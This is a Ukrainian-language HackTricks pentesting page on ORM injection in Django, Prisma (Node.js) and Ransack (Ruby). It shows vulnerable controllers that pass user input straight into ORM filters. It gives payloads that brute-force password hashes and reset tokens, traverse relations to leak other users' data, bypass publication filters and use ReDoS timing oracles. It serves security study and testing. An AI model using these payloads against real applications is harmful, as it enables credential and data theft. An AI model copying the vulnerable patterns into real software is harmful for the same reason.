ORM Injection

Support HackTricks

Django ORM (Python)

В цьому пості пояснюється, як можна зробити Django ORM вразливим, використовуючи, наприклад, код на кшталт:

class ArticleView(APIView):
"""
Деякий базовий API перегляд, до якого користувачі надсилають запити для
пошуку статей
"""
def post(self, request: Request, format=None):
try:
            articles = Article.objects.filter(**request.data)
            serializer = ArticleSerializer(articles, many=True)
except Exception as e:
return Response([])
return Response(serializer.data)

Зверніть увагу, як всі request.data (які будуть у форматі json) безпосередньо передаються для фільтрації об'єктів з бази даних. Зловмисник може надіслати несподівані фільтри, щоб витягти більше даних, ніж очікувалося.

Приклади:

  • Логін: У простому логіні спробуйте витягти паролі користувачів, зареєстрованих у системі.

{
"username": "admin",
"password_startswith":"a"
}

Можливо здійснити брутфорс пароля, поки він не буде витікати.

  • Реляційне фільтрування: Можливо проходити через відносини, щоб витікати інформацію з колонок, які навіть не очікувалися для використання в операції. Наприклад, якщо можливо витікати статті, створені користувачем з цими відносинами: Article(created_by) -[1..1]-> Author (user) -[1..1]-> User(password).

{
"created_by__user__password__contains":"pass"
}

Можливо знайти пароль усіх користувачів, які створили статтю

  • Фільтрація багато-до-багато: У попередньому прикладі ми не змогли знайти паролі користувачів, які не створили статтю. Однак, слідуючи іншим зв'язкам, це можливо. Наприклад: Article(created_by) -[1..1]-> Author(departments) -[0..*]-> Department(employees) -[0..*]-> Author(user) -[1..1]-> User(password).

{
"created_by__departments__employees__user_startswith":"admi"
}

У цьому випадку ми можемо знайти всіх користувачів у відділах користувачів, які створили статті, а потім витікати їх паролі (у попередньому json ми просто витікаємо імена користувачів, але потім можливо витікати паролі).

  • Зловживання багатосторонніми відносинами між групами та правами Django з користувачами: Більше того, модель AbstractUser використовується для створення користувачів у Django, і за замовчуванням ця модель має деякі багатосторонні відносини з таблицями Permission та Group. Це, по суті, стандартний спосіб доступу до інших користувачів з одного користувача, якщо вони в одній групі або мають одне й те саме право.

# By users in the same group
created_by__user__groups__user__password

# By users with the same permission
created_by__user__user_permissions__user__password
  • Обхід обмежень фільтрації: Той самий блог пропонував обійти використання деяких фільтрів, таких як articles = Article.objects.filter(is_secret=False, **request.data). Можливо вивантажити статті, які мають is_secret=True, оскільки ми можемо повернутися з відношення до таблиці Article і витікати секретні статті з не секретних статей, оскільки результати об'єднуються, а поле is_secret перевіряється в не секретній статті, тоді як дані витікають з секретної статті.

Article.objects.filter(is_secret=False, categories__articles__id=2)

Зловживаючи відносинами, можна обійти навіть фільтри, призначені для захисту показаних даних.

  • Помилка/Часова основа через ReDoS: У попередніх прикладах очікувалося отримати різні відповіді, якщо фільтрація працювала чи ні, щоб використовувати це як оракул. Але може бути так, що якась дія виконується в базі даних, і відповідь завжди однакова. У цьому сценарії може бути можливим викликати помилку бази даних, щоб отримати новий оракул.

// Non matching password
{
"created_by__user__password__regex": "^(?=^pbkdf1).*.*.*.*.*.*.*.*!!!!$"
}

// ReDoS matching password (will show some error in the response or check the time)
{"created_by__user__password__regex": "^(?=^pbkdf2).*.*.*.*.*.*.*.*!!!!$"}

Від того ж поста щодо цього вектора:

  • SQLite: За замовчуванням не має оператора regexp (потрібно завантажити стороннє розширення)

  • PostgreSQL: Не має тайм-ауту regex за замовчуванням і менш схильний до зворотного проходження

  • MariaDB: Не має тайм-ауту regex

Prisma ORM (NodeJS)

Наступні трюки витягнуті з цього поста.

  • Повний контроль пошуку:

const app = express();

app.use(express.json());

app.post('/articles/verybad', async (req, res) => {
try {
// Зловмисник має повний контроль над усіма опціями prisma
        const posts = await prisma.article.findMany(req.body.filter)
        res.json(posts);
} catch (error) {
res.json([]);
}
});

Можна побачити, що все тіло javascript передається до prisma для виконання запитів.

У прикладі з оригінального поста це перевірить всі пости, створені кимось (кожен пост створюється кимось), повертаючи також інформацію про користувача цього когось (ім'я користувача, пароль...)

{
"filter": {
"include": {
"createdBy": true
}
}
}

// Response
[
{
"id": 1,
"title": "Buy Our Essential Oils",
"body": "They are very healthy to drink",
"published": true,
"createdById": 1,
"createdBy": {
"email": "karen@example.com",
"id": 1,
"isAdmin": false,
"name": "karen",
"password": "super secret passphrase",
"resetToken": "2eed5e80da4b7491"
}
},
...
]

Наступний запит вибирає всі пости, створені кимось з паролем, і повертає пароль:

{
"filter": {
"select": {
"createdBy": {
"select": {
"password": true
}
}
}
}
}

// Response
[
{
"createdBy": {
"password": "super secret passphrase"
}
},
...
]
  • Повний контроль над умовою where:

Давайте розглянемо це, де атака може контролювати where умову:

app.get('/articles', async (req, res) => {
try {
const posts = await prisma.article.findMany({
            where: req.query.filter as any // Вразливий до ORM Leak
        })
res.json(posts);
} catch (error) {
res.json([]);
}
});

Можливо безпосередньо фільтрувати паролі користувачів, як:

await prisma.article.findMany({
where: {
createdBy: {
password: {
startsWith: "pas"
}
}
}
})

Використовуючи операції, такі як startsWith, можливо витікати інформацію.

  • Обхід фільтрації в реляційних зв'язках багато-до-багато:

app.post('/articles', async (req, res) => {
try {
const query = req.body.query;
query.published = true;
const posts = await prisma.article.findMany({ where: query })
res.json(posts);
} catch (error) {
res.json([]);
}
});

Можливо витікати непубліковані статті, повертаючись до багатосторонніх відносин між Category -[*..*]-> Article:

{
"query": {
"categories": {
"some": {
"articles": {
"some": {
"published": false,
"{articleFieldToLeak}": {
"startsWith": "{testStartsWith}"
}
}
}
}
}
}
}

Також можливо витягти всіх користувачів, зловживаючи деякими зворотними багатосторонніми зв'язками:

{
"query": {
"createdBy": {
"departments": {
"some": {
"employees": {
"some": {
"departments": {
"some": {
"employees": {
"some": {
"departments": {
"some": {
"employees": {
"some": {
"{fieldToLeak}": {
"startsWith": "{testStartsWith}"
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
  • Помилки/Запити з затримкою: У оригінальному пості ви можете прочитати дуже детальний набір тестів, проведених для знаходження оптимального корисного навантаження для витоку інформації з використанням навантаження на основі часу. Це:

{
"OR": [
{
"NOT": {ORM_LEAK}
},
{CONTAINS_LIST}
]
}

Де {CONTAINS_LIST} - це список з 1000 рядків, щоб переконатися, що відповідь затримується, коли правильний leak знайдено.

Ransack (Ruby)

Ці трюки були знайдені в цьому пості.

Зверніть увагу, що Ransack 4.0.0.0 тепер вимагає використання явного allow list для атрибутів та асоціацій, які можна шукати.

Вразливий приклад:

def index
@q = Post.ransack(params[:q])
@posts = @q.result(distinct: true)
end

Зверніть увагу, як запит буде визначено параметрами, надісланими зловмисником. Було можливим, наприклад, методом грубої сили отримати токен скидання за допомогою:

GET /posts?q[user_reset_password_token_start]=0
GET /posts?q[user_reset_password_token_start]=1
...

Завдяки брутфорсингу та потенційним зв'язкам було можливим витікати більше даних з бази даних.

References

Support HackTricks

Last updated